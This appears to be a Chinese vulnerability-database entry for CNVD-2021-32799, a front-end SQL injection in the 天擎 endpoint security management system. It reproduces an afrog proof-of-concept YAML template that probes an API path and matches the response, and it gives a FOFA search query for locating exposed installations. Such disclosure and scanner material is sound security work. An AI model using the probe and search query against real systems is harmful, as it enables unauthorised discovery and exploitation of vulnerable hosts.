CNVD-2021-32799: 天擎终端安全管理系统前台 SQL 注入漏洞

日期: 2025-09-01 | 影响软件: 天擎终端安全管理系统 | POC: 已公开

漏洞描述

主要影响：天擎前台SQL注入 FOFA：app="360天擎终端安全管理系统" 进一步利用/验证方法，参考下面 reference 链接

PoC代码[已公开]

id: CNVD-2021-32799

info:
  name: 天擎终端安全管理系统前台 SQL 注入漏洞
  author: 你是猪
  severity: high
  description: |
    主要影响： 天擎前台SQL注入
    FOFA：app="360天擎终端安全管理系统"
    进一步利用/验证方法，参考下面 reference 链接
  reference:
    - https://blog.51cto.com/u_9691128/4295047
    - https://www.cnvd.org.cn/patchInfo/show/270651

rules:
  r0:
    request:
      method: GET
      path: /api/dp/rptsvcsyncpoint?ccid=1
    expression: response.status == 200 && response.body.bcontains(b'"reason":') && response.body.bcontains(b'"success"') && response.body.bcontains(b'"antiadwa":') && response.body.bcontains(b'"clientupgrade":')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2021/CNVD-2021-32799.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

天擎终端安全管理系统clientinfobymid方法存在SQL注入漏洞 POC

qianxin-360tianqing-adminlogconf-disclosure: 360新天擎终端安全管理系统信息泄露漏洞 POC

天擎终端安全管理系统 /rptsvr/upload 路径存在任意文件上传漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

天擎终端安全管理系统 /rptsvr/upload 路径存在任意文件上传漏洞无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC